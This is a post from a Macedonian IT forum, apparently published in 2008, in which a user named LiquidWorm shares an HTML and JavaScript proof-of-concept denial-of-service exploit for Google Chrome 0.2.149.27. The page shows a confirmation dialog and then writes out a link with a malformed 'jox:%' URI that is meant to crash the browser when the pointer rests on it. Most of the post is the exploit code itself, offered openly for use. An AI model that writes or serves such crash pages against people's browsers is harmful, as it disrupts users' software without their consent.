• Здраво и добредојдовте на форумот на IT.mk.

    Доколку сеуште не сте дел од најголемата заедница на ИТ професионалци и ентузијасти во Македонија, можете бесплатно да се - процесот нема да ви одземе повеќе од 2-3 минути, а за полесна регистрација овозможивме и регистрирање со Facebook и Steam.

Google Chrome Browser 0.2.149.27 Denial of Service Exploit

  • Ја почнал/а темата
  • #1

LiquidWorm

Администратор
26 март 2007
2,672
189
www.zeroscience.mk
Код:
<!-----------------------------------------------
|						|
| Vulnerability discovered by Rishi Narang	|
|						|
| Exploit by LiquidWorm, September 2008		|
| 						|
| http://www.zeroscience.org			|
|						|
| liquidworm [t00t] gmail.com			|
|						|
------------------------------------------------>

<html>

<title>Google Chrome DoS Exploit</title>

<head>

<br />
<br />

<script type="text/javascript">

alert("Google Chrome Browser 0.2.149.27 Denial of Service Exploit");

var box = confirm("Press OK to start exploitation\nPress Cancel to skip exploitation");

if (box == true) 
{
	document.write("Just point to the hyperlink... <a href=\"jox:%\"><strong>HERE</strong></a>");	
}

else { alert("Ok Dude!"); window.location.href = "http://www.zeroscience.org";	}
 
</script>

</head>

</html>
 

Нови мислења

Последни Теми

Статистика

Теми
43,517
Мислења
845,829
Членови
29,316
Најнов член
Melisa.blanco
На врв Дно